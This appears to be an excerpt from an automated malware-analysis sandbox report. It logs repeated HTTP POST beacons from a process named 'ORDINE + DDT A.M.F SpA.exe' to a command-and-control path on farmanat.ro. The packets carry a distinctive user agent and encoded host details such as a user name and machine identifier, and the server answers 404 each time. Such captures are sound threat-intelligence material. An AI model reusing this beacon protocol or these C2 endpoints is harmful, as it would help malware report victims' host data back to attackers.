                                              Nov 25, 2021 10:54:28.164932013 CET7351OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:28.199127913 CET7352OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:28.250722885 CET7352INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              751192.168.11.2050599176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:28.673309088 CET7353OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:28.706809998 CET7353OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:28.756836891 CET7353INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:27 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              752192.168.11.2050600176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:29.175600052 CET7354OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:29.209117889 CET7354OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:29.258585930 CET7355INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              753192.168.11.2050601176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:29.632936001 CET7355OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:29.666925907 CET7356OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:29.716418028 CET7356INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:28 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              754192.168.11.2050602176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:30.061319113 CET7357OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:30.094902992 CET7357OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:30.147492886 CET7357INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              755192.168.11.2050603176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:30.580873013 CET7358OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:30.615057945 CET7358OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:30.665218115 CET7359INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:29 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              756192.168.11.2050604176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:31.098891973 CET7359OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:31.133148909 CET7360OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:31.184423923 CET7360INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              757192.168.11.2050605176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:31.612838030 CET7361OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:31.646614075 CET7361OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:31.704845905 CET7361INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              758192.168.11.2050606176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:32.118997097 CET7362OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:32.153240919 CET7362OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:32.204696894 CET7363INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              759192.168.11.2050607176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:32.556276083 CET7363OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:32.589571953 CET7364OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:32.638225079 CET7364INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:31 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              76192.168.11.2049913176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:48.828094006 CET6421OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:48.862154007 CET6421OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:48.914376974 CET6421INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              760192.168.11.2050608176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:33.057682991 CET7365OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:33.091890097 CET7365OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:33.142641068 CET7365INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              761192.168.11.2050609176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:33.558686972 CET7366OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:33.592837095 CET7366OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:33.644135952 CET7367INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:32 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              762192.168.11.2050610176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:34.080656052 CET7367OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:34.114842892 CET7368OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:34.165272951 CET7368INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              763192.168.11.2050611176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:34.588984966 CET7369OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:34.622477055 CET7369OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:34.671294928 CET7369INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:33 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              764192.168.11.2050612176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:35.090543985 CET7370OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:35.124819994 CET7370OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:35.179450035 CET7371INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              765192.168.11.2050613176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:35.567270041 CET7371OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:35.601305008 CET7372OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:35.651150942 CET7372INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:34 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              766192.168.11.2050614176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:36.074486971 CET7373OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:36.107959986 CET7373OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:36.158060074 CET7373INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              767192.168.11.2050615176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:36.588959932 CET7374OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:36.623321056 CET7374OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:36.675076008 CET7375INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:35 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
